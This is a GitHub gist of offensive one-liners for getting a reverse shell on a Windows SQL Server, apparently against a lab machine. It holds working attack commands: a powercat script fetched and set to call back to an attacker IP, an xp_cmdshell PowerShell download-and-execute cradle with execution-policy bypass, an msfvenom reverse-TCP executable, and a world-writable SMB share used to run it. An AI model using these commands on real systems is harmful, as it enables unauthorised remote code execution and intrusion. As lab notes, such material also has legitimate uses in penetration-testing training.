Skip to content

Instantly share code, notes, and snippets.

@zer0trip

zer0trip/one_liners.md

Forked from wshepherd0010/one_liners.md
Last active March 6, 2019 14:29
Show Gist options
  • Save zer0trip/94606c538d49a1bf53d276caf9d78dd9 to your computer and use it in GitHub Desktop.
Save zer0trip/94606c538d49a1bf53d276caf9d78dd9 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
one_liners.md

method 1 (preferred)

wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

printf "powercat -c <KALI IP> -p 443 -ep\n" >> powercat.ps1

nohup python -m SimpleHTTPServer 80 &

nc -lvp 443 # from another tmux pane, not sure if it mattered...

function pwn(){ mssqlclient.py -debug -windows-auth mssql-svc:[email protected]; } # made it easier for me..

# you'll have to change the IP, but this just worked..
xp_cmdshell "powershell -exec bypass iex((new-object system.net.webclient).downloadstring(\"http://10.10.14.52:80/powercat.ps1\"))"

method 2 (no PS ability)

msfvenom -p windows/shell_reverse_tcp LHOST=<KALI IP> LPORT=443 -f exe > shell.exe 

service smbd start && chmod -R 777 ../

net usershare add pwn `pwd` pwn everyone:F guest_ok=y

nohup nc -lvp 443 &

xp_cmdshell "cmd /c \\<KALI IP>\pwn\shell.exe"

fg 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment